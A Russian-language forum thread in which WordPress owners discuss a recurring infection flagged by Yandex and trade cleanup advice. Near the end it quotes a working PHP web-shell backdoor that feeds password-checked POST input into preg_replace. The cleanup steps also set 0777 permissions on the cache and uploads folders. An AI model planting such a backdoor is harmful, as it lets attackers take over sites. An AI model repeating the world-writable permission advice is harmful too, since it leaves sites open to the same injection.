Яндекс нашел вирус на сайте

ProLiant, либо оставьте этой папке возможность на запись, если это так необходимо. Ну либо вручную по фтп заливайте картинки в эту папку, после чего обратно выставляйте папке запрет на запись. Это на Ваше усмотрение, лично я закрыл всё и ничего менять не буду пока не проясню ситуацию с этим говно-вирусом.

Я тоже пока что закрыл на запись все папки, благо сайты редкообновляемые.

Удалил сегодня файл .php, .swf, .js и убил код который дописался в один из js файлов сайта, не помогло. Опять всей братией появились. Новые файлы с новыми названиями. Пока что заметил, что появляется 3 файла (php swf js) и кусок кода в одном из js скриптов, ничего другого больше найти не смог. Где этот вирус\шелл ума не приложу. Склоняюсь больше к тому что это дырка не в движке сайта или плагинах, это где-то на сервере.

оно проверяет наличие файлов и делает новые если не находит, предложу как временную меру не удалять их, а внести в них типа в начале php exit; в js </script> swf можно байт код чуть подпортить.

Вполне возможно, что достаточно добавить в .js </script>, так как в этом случае вызова .php и .swf не произойдёт. Правда, если вирус проверяет, например, размер файлов, то это не поможет.

можно набить </script> поверх имеющегося в нем текста так чтобы размер сохранить.☝

Да вы успокойтесь, главное.

Как только злоумышленники обнаружат что автоматика не работает, они займутся вашим сайтом вручную и все обязательно снова появится!

Ерундой занимаетесь. Чистить надо не проявления заражения, а лазейку.

Раз сайт на вордпрессе - нет ничего проще, чем обновить вручную движок. Это может решить и вашу проблему, поскольку прописывается вредоносный код обычно из завирусованного файла из папки с сайтом.

Шаг первый- скачиваете сайт на компьютер. Делаете резерв БД.

Шаг второй - заливаете папку с чистым движком (качаете с WordPress.org) сервер. Последняя актуальная версия 3.8

Шаг третий - закачиваете папку uploads, файл wp-config, папку с темой.

Шаг четвертый - скачиваете заново все установленные плагины с WordPress.org/plugins, что бы быть уверенным в отсутствии в них зараженных файлов.

Шаг пятый - обязательно проверяете папку темы на наличие вредоносного кода.

Шаг шестой - выставляете права 0777 на папки cache и uploads.

При заходе в админку выскочит диалоговое окно с предложением обновить БД под новую версию движка,нажимаем Ок - это был седьмой и последний шаг.

В 90% случаев это поможет. Если что- то напортачите - всегда можно загрузить скачанную ранее папку.

В целом, разумная инструкция.

А, собственно, КАК это сделать не понимая нихрена в программировании ? Предполагаем, что другие люди вообще не задают подобных вопросов.

Тему лучше скачать заново. Злоумышленник, зная что у вас там уникальнейший дизайн на целых три строчки отличающийся от оригинала, adsense и счетчики, обязательно посадит шелл туда и переедет он плавно в новую версию.

Лучше уж заново сделать все изменения в файлах темы.

Ну как то же это нашли =)

<?php

if (md5($_POST['p']) == '768f9a3926cc869d7d3c9e10e68ae97a') {

preg_replace($_POST['v1'], $_POST['v2'], $_POST['v3']);

} 

А если папку от записи закрыть - не пролезет со вставкой злоумышленник. Как вариант в дополнение - переименовать тему, сменить пасс на ftp